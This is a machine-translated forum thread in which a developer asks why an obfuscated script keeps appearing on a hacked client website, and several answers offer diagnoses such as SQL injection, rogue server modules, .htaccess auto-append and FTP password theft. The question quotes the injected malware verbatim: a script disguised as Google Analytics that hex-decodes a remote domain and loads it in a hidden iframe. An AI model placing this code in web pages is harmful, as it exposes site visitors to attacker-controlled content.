嗯,我想这一天必须来。
我的客户的网站已被谷歌入侵并列入黑名单。当您加载主页面时,此javascript会自动添加到文档的底部:
<script type="text/javascript">var str='google-analytics.com';var str2='6b756c6b61726e696f6f37312e636f6d';str4='php';var str3='if';str='';for(var i=0;i<str2.length;i=i+2){str=str+'%'+str2.substr(i,2);}str=unescape(str);document.write('<'+str3+'rame width=1 height=1 src="http://'+str+'/index.'+str4+'?id=382" style="visibility: hidden;"></'+str3+'rame>');</script></head><body><iframe src="http://kulkarnioo71.com/index.php?id=382" style="visibility: hidden;" width="1" height="1"></iframe>
我还没有解剖它,但很明显,这是一个试图冒充谷歌分析的攻击者。我无法理解的是,如果我从主页面中删除每个单独的HTML,那么index.html是一个空文档,javascript STILL将被嵌入。是什么赋予了?怎么可能?
更新
该网站是一个非常简单的日历应用程序,运行在$ 10 /月的godaddy unix帐户,MySQL,PHP。
这不是我的电脑特有的本地东西,因为我的客户是那个用问题打电话给我的人。我家里的所有电脑也发生了这种情况(4)
我将在网络服务器上进行扫描......
确定来源
好吧,我发现了javascript的来源。我愚蠢地只清空template.html
文件,但仍然通过我的php模板系统运行脚本。显然,上面的代码已经附加到我的index.php
和main.php
文件的底部了。这怎么可能?
更多背景知识:
答案 0 :(得分:11)
您是否在提供SQL数据库中的任何内容?这种妥协可能是SQL注入攻击,并且数据库中的站点内容已被此脚本/标记替换/修改。
答案 1 :(得分:5)
流氓HTTP模块(在IIS中)或apache的等价物可以为任何HTTP请求预先添加,附加或甚至修改内容,即使对于静态文件也是如此。这表明服务器本身已经受到损害。
编辑:如果您告诉我们您使用的是哪种类型的网络服务器,我们将能够提供更具体的故障排除建议。
答案 2 :(得分:2)
它与.htaccess有关吗?
php_value auto_append_file /server/path/to/my/www_root/subdir/file.ext"
可以自动将文件附加到文档的底部。虽然如果你不能用JS识别文件,那么我想这不太可能。你有没有弄清楚他们是怎么做到的?
答案 3 :(得分:1)
您是否允许来自用户的任何html输入?也许这是没有正确过滤的东西。
答案 4 :(得分:1)
我建议您查看日志文件。每次通过网络访问都应该记录在那里。
答案 5 :(得分:0)
你确定你的机器上的漏洞不是本地的吗?本地的东西是在你的webbrowser中注入HTML,然后让你的浏览器执行JS?
使用Spybot运行可靠的本地扫描,最好是NOD32。如果您不想安装NOD32,因为它可能与您当前的AV冲突,您可以使用Stinger,这是一个作为程序运行的AV扫描程序,不会干扰或需要重新启动。
还在Web服务器上运行扫描。我也看到有人在here等其他论坛上发布了这个帖子。
答案 6 :(得分:0)
一年前,我们遇到过一个与客户类似的问题。
事实证明,客户端正在使用FTP客户端以明文方式保存密码,并且系统感染了一种病毒,该病毒专门扫描系统中的这些密码文件,以覆盖保存在其中的主机的源代码。文件。
有关更多信息,请查看http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/。您会发现它与您遇到的问题非常相似。
我们的解决方案是鼓励客户不要保存密码,或者使用强密码加密的FTP客户端。